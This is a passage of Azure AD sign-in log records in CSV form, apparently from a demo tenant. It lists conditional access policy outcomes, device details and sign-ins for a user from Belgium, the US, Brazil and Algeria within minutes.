'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:38,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",13ab9514-e229-4755-99bf-dc8815850700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,13ab9514-e229-4755-99bf-dc8815850700,SigninLogs,Sucess,50.6406517,5.572050095
+1382,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:20.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ccffbdd0-b150-4db8-8846-7b57e93ae786,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:38,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",13ab9514-e229-4755-99bf-dc8833850700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,13ab9514-e229-4755-99bf-dc8833850700,SigninLogs,Sucess,50.6406517,5.572050095
+1383,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:49.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e241d939-3a35-42e0-a944-18989ab24306,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Windows Sign In,38aa3b87-a06d-4817-b275-7a316988d93b,Mobile Apps and Desktop clients,[],notApplied,08/04/2020 07:28,"{'operatingSystem': 'Windows', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",0cfe4b5b-09c7-4394-bb27-21b9051f0600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0cfe4b5b-09c7-4394-bb27-21b9051f0600,SigninLogs,Sucess,50.6406517,5.572050095
+1384,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:08.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8b62a34a-f7bd-4b4c-aaf3-582e75a049cf,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",65ce963c-c870-4311-8389-19e590880600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,65ce963c-c870-4311-8389-19e590880600,SigninLogs,Sucess,34.06555176,-118.2405396
+1385,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:06.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,788bc14e-f8a6-4f93-829f-c6c4475606c4,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office Delve,94c63fef-13a3-47bc-8074-75af8c65887a,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 32, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:02,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",9303d935-cf24-489a-bd00-a11c5bcd0700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,9303d935-cf24-489a-bd00-a11c5bcd0700,SigninLogs,Sucess,-20.54751015,-47.4056282
+1386,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:08.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2cb2eeee-4240-49f2-a91d-4657fc08a7e5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d09c2317-414d-4072-ab4f-d2f6f75b0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,d09c2317-414d-4072-ab4f-d2f6f75b0800,SigninLogs,Sucess,34.06555176,-118.2405396
+1387,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:46.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,79faf53e-b14c-409e-aa83-a74dd0943d35,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e82050b8-a2c4-426d-8c05-8f1d0cc60700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e82050b8-a2c4-426d-8c05-8f1d0cc60700,SigninLogs,Sucess,50.6406517,5.572050095
+1388,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:21.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e2a4a5ec-d1fc-46ce-8e29-396b09e2d293,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",4f5563e9-cd91-4aaf-8dc5-b5eeef640800,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,4f5563e9-cd91-4aaf-8dc5-b5eeef640800,SigninLogs,Sucess,28,3
+1389,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:50.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6a458475-1b46-4605-a400-c7a920460895,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office Delve,94c63fef-13a3-47bc-8074-75af8c65887a,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 32, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3a4d127f-5a89-4252-9f54-d79d7fdd0700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': 